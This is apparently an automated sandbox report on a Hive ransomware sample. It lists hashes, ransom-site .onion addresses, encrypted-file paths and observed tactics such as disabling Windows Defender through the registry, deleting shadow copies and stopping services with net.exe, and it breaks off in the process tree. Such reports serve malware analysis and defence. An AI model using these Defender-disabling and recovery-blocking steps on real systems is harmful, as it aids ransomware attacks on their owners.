Analysis
-
max time kernel
190s -
max time network
125s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
12-01-2022 16:49
Static task
static1
Behavioral task
behavioral1
Sample
d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe
Resource
win10-en-20211208
General
-
Target
d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe
-
Size
2.8MB
-
MD5
a40c341cc0818d5ccdcb08ccac1a7559
-
SHA1
1d841ebf12a24b92e2de0c22d995385274500a38
-
SHA256
d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac
-
SHA512
ed9d222fa9f919804ecce7f9b3cbd428b2420ce174eab97ab4aae2426fc47b54a3ba3d5c8a7436bbf3cd800852740ab9cc2bef7deefa3cfda223f655e6349b75
Malware Config
Extracted
C:\Program Files\7-Zip\iotb_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 852 MpCmdRun.exe -
Hive
A ransomware written in Golang first seen in June 2021.
-
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 1924 bcdedit.exe 1464 bcdedit.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exedescription ioc process File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Shanghai.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_HfWYPhQrYmA0.j2xnp d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\MP00021_.WMF.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_riMptI5m7HU0.j2xnp d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\fr-FR\js\init.js d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\fr-FR\css\settings.css d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\Stationery\Peacock.htm d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File opened for modification C:\Program Files (x86)\Windows Media Player\es-ES\WMPDMCCore.dll.mui d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\de-DE\slideShow.html d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File created C:\Program Files (x86)\Common Files\microsoft shared\VSTA\8.0\iotb_HOW_TO_DECRYPT.txt d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-lib-uihandler.jar.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_QVae35UIwqM0.j2xnp d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Bangkok.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_t0FT4y1WQNc0.j2xnp d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01240_.GIF.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_2YkZ_mCLLAQ0.j2xnp d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.IE.XML.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_ZyruyCrLZko0.j2xnp d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File opened for modification C:\Program Files\7-Zip\Lang\kk.txt.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_lR-LH5BGSzA0.j2xnp d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\es-ES\rtscom.dll.mui d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-attach_ja.jar.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_dG1gKCL2XYE0.j2xnp d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\J0115876.GIF.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_h69GoWNI8Rg0.j2xnp d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_MediumMAsk.bmp.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_zuO3f0bQsTo0.j2xnp d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File created C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\LEVEL\iotb_HOW_TO_DECRYPT.txt d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\TRANSLAT\FRAR\MSB1FRAR.ITS.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_EdAzsFPoOrI0.j2xnp d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0283209.GIF.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_8QcjDG7rB2k0.j2xnp d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\CONTACTINFOBB.DPV.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_TivHynjiEpY0.j2xnp d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\OrielMergeLetter.Dotx.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_hlIDUXEtFVY0.j2xnp d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler.nl_ja_4.4.0.v20140623020002.jar.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_sPLEMuIXMUg0.j2xnp d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\de-DE\js\settings.js d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0232795.WMF.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_6rB34lbx0Jg0.j2xnp d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-templates_zh_CN.jar.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_GNPLvFP_zFw0.j2xnp d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-bootstrap.xml.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H__x8qpQUJIsE0.j2xnp d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01631_.WMF.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_2zSkv8zaRpQ0.j2xnp d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105588.WMF.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_vnpVUI0zmOQ0.j2xnp d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\MpEvMsg.dll.mui d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\ja-JP\gadget.xml d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0198494.WMF.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_ydqZ9Eibfxs0.j2xnp d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainBackground.wmv d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\Panel_Mask.wmv d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.update\platform.xml.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_Jb5GmcdELIA0.j2xnp d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-compat.xml.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_2OXoKfEVGg40.j2xnp d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_rainy.png d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Excel.en-us\ExcelMUI.XML.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_XmlTqu87f5s0.j2xnp d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\GRID_01.MID.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_MebdR_icuSY0.j2xnp d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\Stationery\HandPrints.jpg d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\fr-FR\oledb32r.dll.mui d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107730.WMF.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_k47sWypKUJ00.j2xnp d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BabyBlue.css.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_W571iuh6NH40.j2xnp d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\es-ES\css\settings.css d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Vienna.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_tf-jit-Efes0.j2xnp d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File opened for modification C:\Program Files\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0217872.WMF.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_bMr12DL6XJI0.j2xnp d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\EMAIL.XML.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_ZU91AzFYbw40.j2xnp d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309902.WMF.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_UlMp6y1OYVs0.j2xnp d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\shuffle_down.png d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\es-ES\gadget.xml d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\zipfs.jar.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_4AjEF-b91xo0.j2xnp d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File opened for modification C:\Program Files\Windows Media Player\Network Sharing\ConnectionManager.xml d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File opened for modification C:\Program Files (x86)\Common Files\System\msadc\de-DE\msadcer.dll.mui d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\iotb_HOW_TO_DECRYPT.txt d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_precomp_matte.wmv d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File opened for modification C:\Program Files\Internet Explorer\SIGNUP\install.ins.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_1CNpioIEzQk0.j2xnp d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+10.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_0Z_gQNoQDd80.j2xnp d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File opened for modification C:\Program Files\Windows Mail\ja-JP\msoeres.dll.mui d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_MfeouGtus0c0.j2xnp d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105250.WMF.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_A_J90vBBQkk0.j2xnp d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Godthab.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_m1IaTRXRn340.j2xnp d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 1028 vssadmin.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.exed64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exepid process 852 powershell.exe 2112 powershell.exe 1308 d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 1952 wevtutil.exe Token: SeBackupPrivilege 1952 wevtutil.exe Token: SeSecurityPrivilege 860 wevtutil.exe Token: SeBackupPrivilege 860 wevtutil.exe Token: SeSecurityPrivilege 1104 wevtutil.exe Token: SeBackupPrivilege 1104 wevtutil.exe Token: SeIncreaseQuotaPrivilege 1712 wmic.exe Token: SeSecurityPrivilege 1712 wmic.exe Token: SeTakeOwnershipPrivilege 1712 wmic.exe Token: SeLoadDriverPrivilege 1712 wmic.exe Token: SeSystemProfilePrivilege 1712 wmic.exe Token: SeSystemtimePrivilege 1712 wmic.exe Token: SeProfSingleProcessPrivilege 1712 wmic.exe Token: SeIncBasePriorityPrivilege 1712 wmic.exe Token: SeCreatePagefilePrivilege 1712 wmic.exe Token: SeBackupPrivilege 1712 wmic.exe Token: SeRestorePrivilege 1712 wmic.exe Token: SeShutdownPrivilege 1712 wmic.exe Token: SeDebugPrivilege 1712 wmic.exe Token: SeSystemEnvironmentPrivilege 1712 wmic.exe Token: SeRemoteShutdownPrivilege 1712 wmic.exe Token: SeUndockPrivilege 1712 wmic.exe Token: SeManageVolumePrivilege 1712 wmic.exe Token: 33 1712 wmic.exe Token: 34 1712 wmic.exe Token: 35 1712 wmic.exe Token: SeIncreaseQuotaPrivilege 1888 wmic.exe Token: SeSecurityPrivilege 1888 wmic.exe Token: SeTakeOwnershipPrivilege 1888 wmic.exe Token: SeLoadDriverPrivilege 1888 wmic.exe Token: SeSystemProfilePrivilege 1888 wmic.exe Token: SeSystemtimePrivilege 1888 wmic.exe Token: SeProfSingleProcessPrivilege 1888 wmic.exe Token: SeIncBasePriorityPrivilege 1888 wmic.exe Token: SeCreatePagefilePrivilege 1888 wmic.exe Token: SeBackupPrivilege 1888 wmic.exe Token: SeRestorePrivilege 1888 wmic.exe Token: SeShutdownPrivilege 1888 wmic.exe Token: SeDebugPrivilege 1888 wmic.exe Token: SeSystemEnvironmentPrivilege 1888 wmic.exe Token: SeRemoteShutdownPrivilege 1888 wmic.exe Token: SeUndockPrivilege 1888 wmic.exe Token: SeManageVolumePrivilege 1888 wmic.exe Token: 33 1888 wmic.exe Token: 34 1888 wmic.exe Token: 35 1888 wmic.exe Token: SeIncreaseQuotaPrivilege 1888 wmic.exe Token: SeSecurityPrivilege 1888 wmic.exe Token: SeTakeOwnershipPrivilege 1888 wmic.exe Token: SeLoadDriverPrivilege 1888 wmic.exe Token: SeSystemProfilePrivilege 1888 wmic.exe Token: SeSystemtimePrivilege 1888 wmic.exe Token: SeProfSingleProcessPrivilege 1888 wmic.exe Token: SeIncBasePriorityPrivilege 1888 wmic.exe Token: SeCreatePagefilePrivilege 1888 wmic.exe Token: SeBackupPrivilege 1888 wmic.exe Token: SeRestorePrivilege 1888 wmic.exe Token: SeShutdownPrivilege 1888 wmic.exe Token: SeDebugPrivilege 1888 wmic.exe Token: SeSystemEnvironmentPrivilege 1888 wmic.exe Token: SeRemoteShutdownPrivilege 1888 wmic.exe Token: SeUndockPrivilege 1888 wmic.exe Token: SeManageVolumePrivilege 1888 wmic.exe Token: 33 1888 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 1308 wrote to memory of 588 1308 d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe net.exe PID 1308 wrote to memory of 588 1308 d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe net.exe PID 1308 wrote to memory of 588 1308 d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe net.exe PID 588 wrote to memory of 544 588 net.exe net1.exe PID 588 wrote to memory of 544 588 net.exe net1.exe PID 588 wrote to memory of 544 588 net.exe net1.exe PID 1308 wrote to memory of 1116 1308 d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe net.exe PID 1308 wrote to memory of 1116 1308 d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe net.exe PID 1308 wrote to memory of 1116 1308 d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe net.exe PID 1116 wrote to memory of 1072 1116 net.exe net1.exe PID 1116 wrote to memory of 1072 1116 net.exe net1.exe PID 1116 wrote to memory of 1072 1116 net.exe net1.exe PID 1308 wrote to memory of 1628 1308 d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe net.exe PID 1308 wrote to memory of 1628 1308 d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe net.exe PID 1308 wrote to memory of 1628 1308 d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe net.exe PID 1628 wrote to memory of 1688 1628 net.exe net1.exe PID 1628 wrote to memory of 1688 1628 net.exe net1.exe PID 1628 wrote to memory of 1688 1628 net.exe net1.exe PID 1308 wrote to memory of 1768 1308 d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe net.exe PID 1308 wrote to memory of 1768 1308 d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe net.exe PID 1308 wrote to memory of 1768 1308 d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe net.exe PID 1768 wrote to memory of 396 1768 net.exe net1.exe PID 1768 wrote to memory of 396 1768 net.exe net1.exe PID 1768 wrote to memory of 396 1768 net.exe net1.exe PID 1308 wrote to memory of 1108 1308 d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe net.exe PID 1308 wrote to memory of 1108 1308 d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe net.exe PID 1308 wrote to memory of 1108 1308 d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe net.exe PID 1108 wrote to memory of 1100 1108 net.exe net1.exe PID 1108 wrote to memory of 1100 1108 net.exe net1.exe PID 1108 wrote to memory of 1100 1108 net.exe net1.exe PID 1308 wrote to memory of 1056 1308 d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe net.exe PID 1308 wrote to memory of 1056 1308 d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe net.exe PID 1308 wrote to memory of 1056 1308 d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe net.exe PID 1056 wrote to memory of 1808 1056 net.exe net1.exe PID 1056 wrote to memory of 1808 1056 net.exe net1.exe PID 1056 wrote to memory of 1808 1056 net.exe net1.exe PID 1308 wrote to memory of 1360 1308 d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe net.exe PID 1308 wrote to memory of 1360 1308 d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe net.exe PID 1308 wrote to memory of 1360 1308 d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe net.exe PID 1360 wrote to memory of 1368 1360 net.exe net1.exe PID 1360 wrote to memory of 1368 1360 net.exe net1.exe PID 1360 wrote to memory of 1368 1360 net.exe net1.exe PID 1308 wrote to memory of 1196 1308 d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe net.exe PID 1308 wrote to memory of 1196 1308 d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe net.exe PID 1308 wrote to memory of 1196 1308 d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe net.exe PID 1196 wrote to memory of 1332 1196 net.exe net1.exe PID 1196 wrote to memory of 1332 1196 net.exe net1.exe PID 1196 wrote to memory of 1332 1196 net.exe net1.exe PID 1308 wrote to memory of 1204 1308 d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe sc.exe PID 1308 wrote to memory of 1204 1308 d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe sc.exe PID 1308 wrote to memory of 1204 1308 d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe sc.exe PID 1308 wrote to memory of 1476 1308 d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe sc.exe PID 1308 wrote to memory of 1476 1308 d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe sc.exe PID 1308 wrote to memory of 1476 1308 d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe sc.exe PID 1308 wrote to memory of 2032 1308 d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe sc.exe PID 1308 wrote to memory of 2032 1308 d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe sc.exe PID 1308 wrote to memory of 2032 1308 d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe sc.exe PID 1308 wrote to memory of 556 1308 d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe sc.exe PID 1308 wrote to memory of 556 1308 d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe sc.exe PID 1308 wrote to memory of 556 1308 d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe sc.exe PID 1308 wrote to memory of 1836 1308 d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe sc.exe PID 1308 wrote to memory of 1836 1308 d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe sc.exe PID 1308 wrote to memory of 1836 1308 d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe sc.exe PID 1308 wrote to memory of 680 1308 d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe sc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe"C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1308 -
C:\Windows\system32\net.exenet.exe stop "NetMsmqActivator" /y2⤵
- Suspicious use of WriteProcessMemory
